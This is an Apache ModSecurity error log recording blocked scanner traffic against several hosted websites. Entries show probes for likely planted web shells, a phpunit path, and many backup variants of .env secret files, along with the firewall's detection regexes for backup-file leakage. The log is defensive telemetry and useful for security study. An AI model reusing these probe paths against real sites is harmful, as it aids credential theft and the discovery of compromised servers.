[Tue May 26 13:51:22.517035 2026] [security2:error] [pid 560287:tid 560472] [client 20.196.127.68:17505] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/ioxi-o.php"] [unique_id "ahVYApmX5s6sDS3wJVcXrAAAALg"]
[Tue May 26 13:51:22.977758 2026] [security2:error] [pid 560287:tid 560540] [client 15.235.169.50:52237] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/about.php"] [unique_id "ahVYApmX5s6sDS3wJVcXswAAAPg"]
[Tue May 26 13:51:23.119089 2026] [security2:error] [pid 560287:tid 560474] [client 20.196.127.68:17478] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/in.php"] [unique_id "ahVYA5mX5s6sDS3wJVcXuQAAALo"]
[Tue May 26 13:51:23.155195 2026] [security2:error] [pid 560287:tid 560522] [client 185.92.25.105:56415] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 105.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/modules/mod_simplefileuploadv1.3/elements/udd.php"] [unique_id "ahVYA5mX5s6sDS3wJVcXuAAAAOg"]
[Tue May 26 13:51:23.461282 2026] [security2:error] [pid 560287:tid 560482] [client 15.235.169.50:52331] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/atomlib.php"] [unique_id "ahVYA5mX5s6sDS3wJVcXvQAAAME"]
[Tue May 26 13:51:23.756837 2026] [security2:error] [pid 560287:tid 560459] [client 20.196.127.68:14925] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/info.php"] [unique_id "ahVYA5mX5s6sDS3wJVcXxAAAAKw"]
[Tue May 26 13:51:23.934867 2026] [security2:error] [pid 555743:tid 555937] [client 15.235.169.50:52413] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/tmpls.php"] [unique_id "ahVYA8jqAquC0YaxQjC3pwAAAUo"]
[Tue May 26 13:51:24.028704 2026] [security2:error] [pid 560287:tid 560457] [client 207.241.173.79:25512] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.production.copy"] [unique_id "ahVYBJmX5s6sDS3wJVcXzgAAAKo"]
[Tue May 26 13:51:24.286715 2026] [security2:error] [pid 560287:tid 560442] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYA5mX5s6sDS3wJVcXzQAAAJw"]
[Tue May 26 13:51:24.381709 2026] [security2:error] [pid 555743:tid 555934] [client 20.196.127.68:14926] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/inputs.php"] [unique_id "ahVYBMjqAquC0YaxQjC3sQAAAUc"]
[Tue May 26 13:51:24.417413 2026] [security2:error] [pid 555743:tid 555915] [client 15.235.169.50:52474] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/as.php"] [unique_id "ahVYBMjqAquC0YaxQjC3swAAATQ"]
[Tue May 26 13:51:24.524015 2026] [security2:error] [pid 555743:tid 555969] [client 20.151.111.128:3185] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahVYBMjqAquC0YaxQjC3tAAAAWo"]
[Tue May 26 13:51:24.576532 2026] [security2:error] [pid 555743:tid 555970] [client 185.92.25.136:36591] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/plugins/pwnd/pwnd.php"] [unique_id "ahVYBMjqAquC0YaxQjC3twAAAWs"]
[Tue May 26 13:51:24.880832 2026] [security2:error] [pid 560287:tid 560446] [client 15.235.169.50:52534] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/randkeyword.php"] [unique_id "ahVYBJmX5s6sDS3wJVcX1AAAAKA"]
[Tue May 26 13:51:24.927037 2026] [security2:error] [pid 560287:tid 560463] [client 185.192.71.241:26237] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 241.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/plugins/pwnd-1/pwnd.php"] [unique_id "ahVYBJmX5s6sDS3wJVcX1QAAALA"]
[Tue May 26 13:51:25.007220 2026] [security2:error] [pid 555743:tid 555953] [client 20.196.127.68:17487] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/item.php"] [unique_id "ahVYBcjqAquC0YaxQjC3wQAAAVo"]
[Tue May 26 13:51:25.359579 2026] [security2:error] [pid 560287:tid 560438] [client 15.235.169.50:52619] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/install.php"] [unique_id "ahVYBZmX5s6sDS3wJVcX3wAAAJk"]
[Tue May 26 13:51:25.384139 2026] [security2:error] [pid 560287:tid 560490] [client 185.192.71.244:63145] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/css/colors/midnight/admin.php"] [unique_id "ahVYBZmX5s6sDS3wJVcX2wAAAMk"]
[Tue May 26 13:51:25.430221 2026] [security2:error] [pid 560287:tid 560475] [client 207.241.173.79:20100] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.production.backup"] [unique_id "ahVYBZmX5s6sDS3wJVcX5QAAALs"]
[Tue May 26 13:51:25.430245 2026] [security2:error] [pid 560287:tid 560436] [client 207.241.173.79:20038] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.local.old"] [unique_id "ahVYBZmX5s6sDS3wJVcX4wAAAJc"]
[Tue May 26 13:51:25.430245 2026] [security2:error] [pid 560287:tid 560472] [client 207.241.173.79:20140] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.production.orig"] [unique_id "ahVYBZmX5s6sDS3wJVcX5AAAALg"]
[Tue May 26 13:51:25.430609 2026] [security2:error] [pid 555743:tid 555946] [client 207.241.173.79:20008] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.orig"] [unique_id "ahVYBcjqAquC0YaxQjC3yQAAAVM"]
[Tue May 26 13:51:25.430723 2026] [security2:error] [pid 560287:tid 560526] [client 207.241.173.79:20088] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.production.old"] [unique_id "ahVYBZmX5s6sDS3wJVcX5gAAAOw"]
[Tue May 26 13:51:25.431031 2026] [security2:error] [pid 560287:tid 560491] [client 207.241.173.79:20018] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.copy"] [unique_id "ahVYBZmX5s6sDS3wJVcX6QAAAMo"]
[Tue May 26 13:51:25.431051 2026] [security2:error] [pid 555743:tid 555883] [client 207.241.173.79:20058] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.local~"] [unique_id "ahVYBcjqAquC0YaxQjC3yAAAARQ"]
[Tue May 26 13:51:25.431536 2026] [security2:error] [pid 555743:tid 555952] [client 207.241.173.79:20048] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.local.backup"] [unique_id "ahVYBcjqAquC0YaxQjC3ygAAAVk"]
[Tue May 26 13:51:25.431544 2026] [security2:error] [pid 560287:tid 560455] [client 207.241.173.79:20078] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.production.bak"] [unique_id "ahVYBZmX5s6sDS3wJVcX6gAAAKg"]
[Tue May 26 13:51:25.432601 2026] [security2:error] [pid 555743:tid 555981] [client 207.241.173.79:19996] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.swp"] [unique_id "ahVYBcjqAquC0YaxQjC3zQAAAXY"]
[Tue May 26 13:51:25.432699 2026] [security2:error] [pid 560287:tid 560511] [client 207.241.173.79:20118] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.production~"] [unique_id "ahVYBZmX5s6sDS3wJVcX7gAAAN0"]
[Tue May 26 13:51:25.432704 2026] [security2:error] [pid 560287:tid 560524] [client 207.241.173.79:19970] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.backup"] [unique_id "ahVYBZmX5s6sDS3wJVcX6AAAAOo"]
[Tue May 26 13:51:25.433103 2026] [security2:error] [pid 560287:tid 560509] [client 207.241.173.79:20134] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.production.swp"] [unique_id "ahVYBZmX5s6sDS3wJVcX7wAAANs"]
[Tue May 26 13:51:25.433111 2026] [security2:error] [pid 560287:tid 560541] [client 207.241.173.79:20062] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.local.orig"] [unique_id "ahVYBZmX5s6sDS3wJVcX7QAAAPk"]
[Tue May 26 13:51:25.433839 2026] [security2:error] [pid 555743:tid 555966] [client 207.241.173.79:19952] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.bak"] [unique_id "ahVYBcjqAquC0YaxQjC30QAAAWc"]
[Tue May 26 13:51:25.434060 2026] [security2:error] [pid 560287:tid 560476] [client 207.241.173.79:19994] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env~"] [unique_id "ahVYBZmX5s6sDS3wJVcX8AAAALw"]
[Tue May 26 13:51:25.434726 2026] [security2:error] [pid 560287:tid 560450] [client 207.241.173.79:20064] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.local.copy"] [unique_id "ahVYBZmX5s6sDS3wJVcX8wAAAKQ"]
[Tue May 26 13:51:25.435015 2026] [security2:error] [pid 555743:tid 555881] [client 207.241.173.79:20030] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.local.bak"] [unique_id "ahVYBcjqAquC0YaxQjC3zwAAARI"]
[Tue May 26 13:51:25.435775 2026] [security2:error] [pid 560287:tid 560531] [client 207.241.173.79:19956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.old"] [unique_id "ahVYBZmX5s6sDS3wJVcX8gAAAPE"]
[Tue May 26 13:51:25.466366 2026] [security2:error] [pid 560287:tid 560523] [client 20.151.111.128:3155] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/zvmjauiw.php"] [unique_id "ahVYBZmX5s6sDS3wJVcX-wAAAOk"], referer: www.google.com
[Tue May 26 13:51:25.538149 2026] [security2:error] [pid 555743:tid 556000] [client 207.241.173.79:20116] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.local.swp"] [unique_id "ahVYBcjqAquC0YaxQjC30wAAAYk"]
[Tue May 26 13:51:25.631034 2026] [security2:error] [pid 560287:tid 560545] [client 20.196.127.68:13297] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/k.php"] [unique_id "ahVYBZmX5s6sDS3wJVcX_gAAAP0"]
[Tue May 26 13:51:25.773271 2026] [security2:error] [pid 560287:tid 560469] [client 185.92.25.100:44907] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/kill.php"] [unique_id "ahVYBZmX5s6sDS3wJVcYAAAAALU"]
[Tue May 26 13:51:25.837495 2026] [security2:error] [pid 560287:tid 560481] [client 15.235.169.50:52701] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/assets/radio.php"] [unique_id "ahVYBZmX5s6sDS3wJVcYAwAAAMA"]
[Tue May 26 13:51:25.867184 2026] [security2:error] [pid 560287:tid 560507] [client 74.7.175.141:49392] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.d2cargo.com.onesoft.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVYBZmX5s6sDS3wJVcYBAAA2Tw"]
[Tue May 26 13:51:25.872895 2026] [security2:error] [pid 560287:tid 560474] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYBZmX5s6sDS3wJVcX-gAAALo"]
[Tue May 26 13:51:26.243256 2026] [security2:error] [pid 560287:tid 560519] [client 91.230.225.167:31585] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/style-engine/worksec.php"] [unique_id "ahVYBpmX5s6sDS3wJVcYCAAAAOU"]
[Tue May 26 13:51:26.269410 2026] [security2:error] [pid 560287:tid 560435] [client 20.196.127.68:13261] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/license.php"] [unique_id "ahVYBpmX5s6sDS3wJVcYDAAAAJY"]
[Tue May 26 13:51:26.297051 2026] [security2:error] [pid 560287:tid 560442] [client 15.235.169.50:52783] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/file.php"] [unique_id "ahVYBpmX5s6sDS3wJVcYDQAAAJw"]
[Tue May 26 13:51:26.712430 2026] [security2:error] [pid 555743:tid 555890] [client 185.92.25.106:61357] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/images/wp-conflg.php"] [unique_id "ahVYBsjqAquC0YaxQjC33QAAARs"]
[Tue May 26 13:51:26.782463 2026] [security2:error] [pid 560287:tid 560492] [client 15.235.169.50:52853] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/content.php"] [unique_id "ahVYBpmX5s6sDS3wJVcYGwAAAMs"]
[Tue May 26 13:51:26.930873 2026] [security2:error] [pid 560287:tid 560446] [client 20.196.127.68:13970] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/load.php"] [unique_id "ahVYBpmX5s6sDS3wJVcYHgAAAKA"]
[Tue May 26 13:51:27.222436 2026] [security2:error] [pid 560287:tid 560447] [client 185.192.71.227:39565] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/plugins/core-plugin/include.php"] [unique_id "ahVYB5mX5s6sDS3wJVcYIgAAAKE"]
[Tue May 26 13:51:27.274610 2026] [security2:error] [pid 560287:tid 560455] [client 15.235.169.50:52911] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/lock.php"] [unique_id "ahVYB5mX5s6sDS3wJVcYIwAAAKg"]
[Tue May 26 13:51:27.476171 2026] [security2:error] [pid 560287:tid 560504] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYB5mX5s6sDS3wJVcYIQAAANY"]
[Tue May 26 13:51:27.514074 2026] [security2:error] [pid 560287:tid 560509] [client 20.196.127.68:13990] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/manager.php"] [unique_id "ahVYB5mX5s6sDS3wJVcYLQAAANs"]
[Tue May 26 13:51:27.664721 2026] [security2:error] [pid 555743:tid 555949] [client 185.92.25.100:28797] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/plugins/envato-css.php"] [unique_id "ahVYB8jqAquC0YaxQjC35gAAAVY"]
[Tue May 26 13:51:27.761762 2026] [security2:error] [pid 560287:tid 560551] [client 15.235.169.50:52975] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/images/v1.php"] [unique_id "ahVYB5mX5s6sDS3wJVcYMwAAAQM"]
